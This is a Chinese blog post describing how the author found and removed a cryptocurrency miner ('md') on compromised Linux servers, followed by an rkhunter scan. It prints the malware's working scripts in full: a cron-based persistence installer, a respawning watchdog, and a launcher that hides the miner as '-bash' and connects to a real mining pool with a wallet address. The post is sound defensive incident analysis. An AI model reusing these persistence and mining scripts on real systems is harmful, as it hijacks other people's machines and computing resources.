linux 出现md挖矿程序,遭遇挖矿程序怎么办?看这里你就明白了

最新推荐文章于 2023-06-14 14:35:31 发布
最新推荐文章于 2023-06-14 14:35:31 发布
阅读量1k 收藏 1
点赞数
文章标签: linux 出现md挖矿程序

问题分析

1. 两台服务器收到告警,top 查看进程发现如下可疑进程

# top

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND

19078 vmuser 20 0 680232 14284 1032 S 342.8 0.1 1583:11 md

501 vmuser 20 0 32348 3264 760 R 55.9 0.0 2172:49 [atd]

504 vmuser 20 0 32348 3264 760 R 46.7 0.0 2000:21 [atd]

18469 vmuser 20 0 32348 3504 984 R 46.1 0.0 1252:47 [atd]

18692 vmuser 20 0 32348 3408 908 R 43.1 0.0 318:58.87 [atd]

18695 vmuser 20 0 32348 3536 1020 R 42.8 0.0 129:26.05 [atd]

10547 vmuser 20 0 32348 3412 908 R 40.8 0.0 72:19.69 [atd]

8658 vmuser 20 0 32348 3400 880 R 40.5 0.0 4606:03 [atd]

8655 vmuser 20 0 32348 3468 948 R 40.1 0.0 4383:23 [atd]

10542 vmuser 20 0 32348 3408 908 S 24.7 0.0 90:27.13 [atd]

8549 vmuser 20 0 32348 3372 868 R 9.9 0.0 323:27.79 [atd]

用户名为 vmuser 的可疑进程

2. 查看 md 进程详情

# ps aux | grep 19078

vmuser 19078 343 0.0 680232 13764 ? Sl 07:38 1613:58 -bash -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk5c12V3YAb5gLekc5N8SizEpbpDogviaU2U9tff2F9JafNFS9pxmF1PNf4aZrMjRSqd9bhjXn7dbpmepNjKi586ZtD9Cv9N -p x

查询后果然和自己判断一样是一个挖矿程序

3. 查找用户程序目录

ls -l /proc/19078/exe

lrwxrwxrwx 1 vmuser vmuser 0 Jan 29 07:38 /proc/19078/exe -> /tmp/.n/md

4. 进入 /tmp/.n/ 目录有如下文件

# ll -sh

total 4.1M

4.0K -rwxr-xr-x 1 vmuser vmuser 327 Jan 23 08:03 1

4.0K -rwxr-xr-x 1 vmuser vmuser 329 Oct 27 21:30 a

4.0K -rw-r--r-- 1 vmuser vmuser 5 Jan 23 14:55 bash.pid

4.0K -rw-r--r-- 1 vmuser vmuser 38 Jan 23 08:11 cron.d

4.0K -rw-r--r-- 1 vmuser vmuser 8 Jan 23 08:11 dir.dir

16K -rwxr-xr-x 1 vmuser vmuser 15K Feb 21 2016 h32

820K -rwxr-xr-x 1 vmuser vmuser 819K Feb 21 2016 h64

2.9M -rwxr-xr-x 1 vmuser vmuser 2.9M Jun 24 2017 md

224K -rwxr-xr-x 1 vmuser vmuser 222K Oct 22 22:25 md32

168K -rwxr-xr-x 1 vmuser vmuser 165K Sep 27 18:58 mdx

4.0K -rwxr-xr-x 1 vmuser vmuser 586 Jan 23 08:03 run

4.0K -rwxr--r-- 1 vmuser vmuser 170 Jan 23 08:11 upd

4.0K -rwxr-xr-x 1 vmuser vmuser 24 Oct 5 02:45 x

4.0K -rwxr--r-- 1 vmuser vmuser 139 Nov 6 05:21 z

5. 挖矿程序分析

x 文件,文件下载后首先执行x文件

# vim x

nohup ./a >>/dev/null & #执行 a 文件

a 文件

# vim a

pwd > dir.dir

dir=$(cat dir.dir)

echo "* * * * * $dir/upd >/dev/null 2>&1" > cron.d

crontab cron.d

crontab -l | grep upd

echo "#!/bin/sh

if test -r $dir/bash.pid; then

pid=\$(cat $dir/bash.pid)

if \$(kill -CHLD \$pid >/dev/null 2>&1)

then

sleep 1

else

cd $dir

./run &>/dev/null

exit 0

fi

fi" >upd

chmod u+x upd

./run &>/dev/null

获取当前目录,定时任务一直执行 upd 文件

upd 文件

# vim upd

#!/bin/sh

if test -r /tmp/.n/bash.pid; then

pid=$(cat /tmp/.n/bash.pid)

if $(kill -CHLD $pid >/dev/null 2>&1)

then

sleep 1

else

cd /tmp/.n

./run &>/dev/null

exit 0

fi

fi

检查 /tmp/.n/bash.pid 文件是否可读,如果可读就读出里面的 pid,直接kill掉,重新执行 run

run 文件,挖矿程序的主体

# vim run

#!/bin/bash

proc=`nproc`

ARCH=`uname -m`

HIDE="-bash"

if [ "$ARCH" == "i686" ]; then

./h32 -s $HIDE ./md32 -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333:13333 -u etnk5c12V3YAb5gLekc5N8SizEpbpDogviaU2U9tff2F9JafNFS9pxmF1PNf4aZrMjRSqd9bhjXn7dbpmepNjKi586ZtD9Cv9N -p x >>/dev/null &

elif [ "$ARCH" == "x86_64" ]; then

./h64 -s $HIDE ./md -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk5c12V3YAb5gLekc5N8SizEpbpDogviaU2U9tff2F9JafNFS9pxmF1PNf4aZrMjRSqd9bhjXn7dbpmepNjKi586ZtD9Cv9N -p x >>/dev/null &

fi

echo $! > bash.pid

这个核心文件就是读出操作系统的硬件架构,如果是i386就执行32位的h32和md32,猜测h32是用于让系统显示的进程名称,md32才是真正的挖矿程序。执行完成了就把进程id写入bash.pid中。

6. 过程总结

找系统漏洞->获取权限->创建目录->上传文件->执行x,执行a->a启动crontab执行upd,生成upd并赋权->upd去执行run->run去执行真正的挖矿程序。

清除挖矿程序

1. kill 掉可疑进程,删除程序目录

# kill -9 19078 && rm -rf /tmp/.n && rm -rf /tmp/.a

2. 修改 vmuser 用户密码

注意到挖矿程序都是 vmuser 用户,所以修改 vmuser 用户密码

# passwd vmuser

入侵检测

不放心,使用 rkhunter 检测一下

1. 下载安装

# wget https://nchc.dl.sourceforge.net/project/rkhunter/rkhunter/1.4.4/rkhunter-1.4.4.tar.gz

# tar zxvf rkhunter-1.4.4.tar.gz && tar zxvf rkhunter-1.4.4.tar.gz && cd rkhunter-1.4.4

# ./install.sh --install

2. 入侵检测

# rkhunter -c -sk

System checks summary

=====================

File properties checks...

Required commands check failed

Files checked: 136

Suspect files: 5

Rootkit checks...

Rootkits checked : 481

Possible rootkits: 0

Applications checks...

All checks skipped

The system checks took: 7 minutes and 22 seconds

All results have been written to the log file: /var/log/rkhunter.log

One or more warnings have been found while checking the system.

Please check the log file (/var/log/rkhunter.log)

Suspect files 的警告和正常服务器上的一致,这里忽略

3. 卸载 rkhunter

# cd rkhunter-1.4.4 && ./install.sh --remove

亦梦如是
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux进程管理(Ubuntu).md
06-17
主要介绍Linux关于进程管理的创建,PID的获取,进程的等待和销毁等内容。 一个组成部分是操作系统用来管理进程的内核对象。内核对象也是系统用来存放关于进程的统计信息的地方。
linux md进程占用100,Linux性能优化--CPU到100%了该怎么办(上)
weixin_35152781的博客
04-29 489
如果CPU导了100%,第一步肯定用top命令来查看top - 15:12:21 up 245 days, 20:55, 2 users, load average: 0.98, 0.74, 0.38Tasks: 131 total, 2 running, 129 sleeping, 0 stopped, 0 zombie%Cpu(s): 25.1 us, 0.2 sy, 0....
Linuxmd64进程,在Linux上安装Elasticsearch Kibaba.md
weixin_30114595的博客
05-10 86
Linux上安装Elasticsearch KibabaKibana是一个开源为elasticsearch 引擎提供数据和数据分析1、下载安装切换到root账户,按顺序依次执行以下命令rpm包安装$wget -c https://artifacts.elastic.co/downloads/kibana/kibana-5.5.3-x86_64.rpm$sha1sum kibana-5.3.2-x...
linux md进程占用100,Linux进程占用CPU100%的解决方法
weixin_39528029的博客
04-29 503
Linux进程占用CPU100%的解决方法发布时间:2014-03-21 15:50:45来源:红联作者:tiocedlinux 很好,占用系统资源低,低端机都可以流畅的运行.但是偶尔也会遇到像windows下烦人的问题,那就是进程占用CPU100%.最近我就遇到了这个问题,还好,我使用了一套组合拳,把占用CPU资源100%的进程给干掉了.步骤是:1)先top,查看进程运行状况,包括进程ID,C...
Linux 常用命令
candyxplay的博客
09-06 187
远程连接 远程连接数据库 mysql -u{root} -p[port] -h{ip} 远程连接 ssh -p {port} root@{ip} 本机网络 多IP机器更换IP iptables -t nat -I POSTROUTING -o 网卡名 -d 0.0.0.0/0 -s 机器默认ip -j SNAT --to-source...
linux挖矿检测脚本
最新发布
07-25
执行自动检测
Linux设备驱动程序(第三版)pdf+源码
06-06
从git上下载的源码,程序员应该要学好英语的!具体编译方法,还请参考git或者源码中的readme,附上git地址。 The original code:9780596005900-master.zip The new code(Last commit 2018.2.26):ldd3-master.zip ...
嵌入式Linux应用程序开发标准教程第2版完整版
11-28
嵌入式Linux应用程序开发教程 第二版,完整版,充分讲叙了linux的基础命令,C编程基础,文件IO,进程控制及通信,多线程及驱动,QT开发
初探Linux进程——僵尸进程和父子关系
huqinwei的专栏
11-12 5736
第三列是PPID,即使不是很清楚这里边的内涵,闭着眼猜也能猜出个一二来了。可以看到僵尸进程13962确实是由父进程13961(我的可执行文件叫zombie)创造的,而13961是2427bash创造的,2427是由2422gnome-terminal,也就是我打开的终端创造的,那么终端2422的parent就是1了,1已经是init了,这大概也就是这个系统从初始化到我运行的这个东西的一个流程了吧,这个Linux还真是便于学习,一目了然,具体1,2,3等等都是干什么的就先不管了,很多进程全是直接衍生自1和2,
>/dev/null 2>&1 解决烦人的标准输入
Vange的专栏
03-28 3494
为什么要用 /dev/null 2>&1 这样的写法.这条命令的意思是将标准输出和错误输出全部重定向到/dev/null中,也就是将产生的所有信息丢弃.下面我就为大家来说一下, command > file 2>file   与command > file 2>&1 有什么不同的地方.       首先~command > file 2>file 的意思是将命令所产
如何检查并清除挖矿程序
haodoubi的博客
02-19 8376
1.检查cpu使用率 根据cpu使用率曲线确定2.11日可能被注入挖矿程序,根据top确定挖矿程序进程kdevtmpfsi 2.确定挖矿进程程序位置 find / -name kdevtmpfsi ll 查看安装时间,对比cpu突然拔升时间 3.检查psadm2用户的合法性 4.检查root或者psadm2用户下是否有定时挖矿的复制文件任务 crontab -l crontab -r 删除定时任务 5.杀死挖矿进程 pkill kdevtmpfsi 6.删...
03.进程和线程.md
寒夜
02-28 5万+
文章目录3. 进程是什么3.1 进程包含的东西3.2 进程状态3.3 进程的控制3.3.1. 执行模式3.3.2. 进程的创建3.3.3. 进程的切换时机3.3.3.4 进程的模式切换3.3.3.5 进程切换3.4 操作系统的执行3.4.1 无进程内核3.4.2 在用户进程内运行3.4.3 基于进程的操作系统4. 线程4.1 什么是线程4.2 用户级和内核级线程4.3 线程和进程的区别 3. 进程...
Linux 下手动查杀木马过程
热门推荐
高飞的博客
08-04 11万+
系统安全
记录一次服务器被攻击的事件,被当作了肉鸡
weixin_62220704的博客
06-14 1017
事件的起因是这样的,我们公司内网有台机器,ip为192.168.13.240,这台机器不用做生产,只是为了方便测试。过年之后到公司,突然这台机器就开不了机了,网上各种翻阅资料,最后能开机了,但数据盘格式化了。我也没太在意。我偶尔会登录,发现机器特别卡,没怎么注意,中间重启过几次,也是一样的。今天我又要用到机器测试些服务,卡的我特别烦躁,下定决心要找到原因。一排查发现自己已经是肉鸡了。
Linux挖矿病毒排查(通过redis入侵服务器原理)
程序员阿飘 的博客
01-11 1357
3.将公钥写入目标机器的authorized_keys 文件* cat foo | redis-cli -h 12.34.56.78 -x set crackit* redis-cli -h 12.34.56.78* config set dir /root/.ssh/* config get dir* config set dbfilename "authorized_keys"执行程序在/tmp下2.find / -name qW3xT.4, find / -name ddgs.3016;
遭遇syst3md挖矿病毒(2)
u013469501的博客
04-14 1045
上一篇说道我清除了syst3md挖矿病毒程序后,原本以为这事就解决了,可事情没这么简单,top命令显示虽然没有高消耗的进程,但US%很持续50%,32核的长期占用16核的100%,见下图 在使用一系列操作系统命令排查后,占用cpu较高的程序进程始终没有找到。 期间考虑过是不是由于操作系统内核版本命中了有缺陷的内核导致的,但和其他一样操作系统比对来看,那台机器并没有发生这种现象。 最终,将排查方向还是锁定在病毒未清除干净这个方向上。继续参考了多个博客发现一个共同点,那就是top命令中的用户
Linux 2.6内核MD机制
少想多做
11-12 3357
那么MD要如何看起?这个问题在我脑中也没有特别清晰的脉络,因为MD中的代码很杂,并没有很清晰的层次或类别关系,所以我打算想到哪里就写到哪里。但不管怎么说先建立一个对MD的总体印象是很有帮助的。 首先,创建了一个MD设备,我们可以通过mdadm –E来查看MD中各设备的情况(E -examine),或者通过mdadm –D来直接查看MD的状态(D –detail)。那么这些信息是从哪里来的呢?这就
从零开始的Linux及Arm-Linux程序开发指南
"Linux及Arm-Linux程序开发笔记(零基础入门篇)" 本文是一份针对初学者的Linux及Arm-Linux程序开发指南,旨在帮助完全没有Linux背景的开发者快速入门。作者通过自己的学习历程,详细介绍了从搭建开发环境到编写...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值